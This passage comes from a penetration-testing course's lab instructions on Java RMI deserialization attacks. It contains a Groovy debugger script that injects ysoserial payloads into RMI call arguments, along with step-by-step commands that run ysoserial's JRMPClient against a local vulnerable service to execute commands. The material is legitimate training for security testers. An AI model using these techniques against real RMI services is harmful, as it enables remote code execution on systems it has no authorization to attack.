provides a Groovy wrapper for JDI so that it can be easily scripted. What we need to achieve is set a
the parameters that are passed to the RMI call before they get serialized by the client.
mogwailabs.de were generous enough to provide the community with a such a script and a
© 2020 Caendra Inc. | WAPTXv2
26
println "[+]
java.rmi.server.RemoteObjectInvocationHandler.invokeRemoteMethod() is
called"
// make sure that the payload class is loaded by the classloader of
the debugee
vm.loadClass("ysoserial.payloads." + payloadName);
// get the Array of Objects that were passed as Arguments
delegate."@2".eachWithIndex { arg,idx ->
println "[+] Argument " + idx + ": " + arg[0].toString();
if(arg[0].toString().contains(needle)) {
println "[+] Needle " + needle + " found, replacing String with
payload"
// Create a new instance of the ysoserial payload in the
debuggee
def payload = vm._new("ysoserial.payloads." + payloadName);
def payloadObject = payload.getObject(payloadCommand)
vm.ref("java.lang.reflect.Array").set(delegate."@2",idx,
payloadObject);
println "[+] Done.."
}
}
}
To try this attack on the
provided Virtual Machine, perform the below.
▪
Execute
sudo
update-alternatives
--config
java
and
choose
/opt/jdk/jdk1.8.0_151/bin/java
▪
Start the vulnerable RMI Service
o cd
/home/developer/Downloads/vulnerable/rmi-
deserialization/BSidesMucRmiService/target
o java -jar BSidesRMIService-0.1-jar-with-dependencies.jar
▪
Start the client in a new terminal (simulating the attacker at this point)
o cd
/home/developer/Downloads/vulnerable/rmi-
deserialization/BSidesMucRmiService/target
o java
-
agentlib:jdwp=transport=dt_socket,server=y,address=127.0.0.1:8000
-cp
"./libs/*"
de.mogwailabs.BSidesRMIService.BSidesClient
127.0.0.1
▪
Start the proxy in a new terminal
o cd /home/developer/Downloads/
o java -jar youdebug-1.5.jar -socket 127.0.0.1:8000 barmitzwa.groovy
© 2020 Caendra Inc. | WAPTXv2
27
A file named “pwn3d_by_barmitzwa” should now exist inside the /tmp directory!
----------
So far, we have seen remote code execution being achieved through class loading. When it comes to
RMI services where a valid gadget is available in the classpath, remote code execution can also be
achieved by attacking the Distributed Garbage Collection (DGC) for deserialization of untrusted data,
in older versions of Java.
To try this attack on the provided Virtual Machine, perform the below.
▪
Execute
sudo
update-alternatives
--config
java
and
choose
/opt/jdk/jdk1.7.0_80/bin/java
▪
Terminate and restart the vulnerable RMI Service
o cd
/home/developer/Downloads/vulnerable/rmi-
deserialization/BSidesMucRmiService/target
o java -jar BSidesRMIService-0.1-jar-with-dependencies.jar
▪
Start the attacking client (an older version of CommonsCollections is bundled with the
vulnerable service)
o cd /home/developer/Downloads/
o java
-cp
ysoserial-master-30099844c6-1.jar
ysoserial.exploit.JRMPClient 127.0.0.1 1099 CommonsCollections1
"touch /tmp/xxx"
A file named “xxx” should now exist inside the /tmp directory!
© 2020 Caendra Inc. | WAPTXv2
Do'stlaringiz bilan baham: